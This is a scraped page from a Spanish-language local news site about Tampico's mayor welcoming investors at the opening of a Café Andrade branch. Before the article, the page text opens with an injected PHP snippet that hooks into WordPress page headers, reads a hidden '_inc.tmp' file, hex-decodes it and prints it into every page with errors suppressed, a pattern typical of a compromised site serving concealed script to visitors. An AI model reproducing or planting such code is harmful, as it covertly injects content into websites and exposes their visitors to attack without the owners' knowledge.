if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Crece interés de inversionistas en Tampico – Reporte Noreste
Conéctate con nosotros

Acciones de Gobierno

Crece interés de inversionistas en Tampico

Crece interés de inversionistas en Tampico

Al participar en la inauguración de una sucursal de Café Andrade, el Presidente Municipal de Tampico Chucho Nader dio la bienvenida a los inversionistas, destacando que la presencia de esta empresa de origen veracruzano, es el reflejo de la confianza que los empresarios tienen en la ciudad, que muestra un rostro moderno, competitivo y con visión de futuro.

Acompañado de su esposa Aída Féres de Nader, Presidenta del Sistema DIF Tampico, el jefe edilicio realizó el corte del listón de esta firma de más de 80 años de tradición cafetalera, que abre en el país su sucursal número 15 en la Calle México No. 206 de la Col. Guadalupe en Tampico.

Al dar la bienvenida a los empresarios José Luis, Julem y Joshua Andrade, Francisco López Cintron y Jihat El Khoury Karam, Chucho Nader destacó que Tampico es una ciudad de puertas abiertas y agradeció a los inversionistas su confianza en nuestra ciudad para abrir una nueva sucursal.

“Estamos seguro que la calidad de sus productos y sus más de 80 años de experiencia, conquistarán los exigentes paladares de los tampiqueños, quienes sabemos disfrutar del buen café, somos ejemplo nacional al ser la ciudad más segura del país y eso lo notan los empresarios como ustedes, quienes ven en esta hermosa tierra el potencial de crecimiento y expansión”.

Asimismo se comprometió a seguir dándoles facilidades y certidumbre a todos los inversionistas, reduciendo trámites para que nuevas empresas sigan llegando, ya que eso representa bienestar para los tampiqueños.

Nader Nasrallah hizo énfasis en que Tampico hoy crece en un ambiente tranquilo y en paz, e inspira autoridades, empresarios y ciudadanía a seguir haciendo grandes cosas para que se consolide cada vez más como el gran polo de desarrollo que es.

“Bienvenido Café Andrade a Tampico, la ciudad que está de moda, agradezco su confianza y les auguro gran éxito, que Dios los bendiga”, dijo finalmente.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Acciones de Gobierno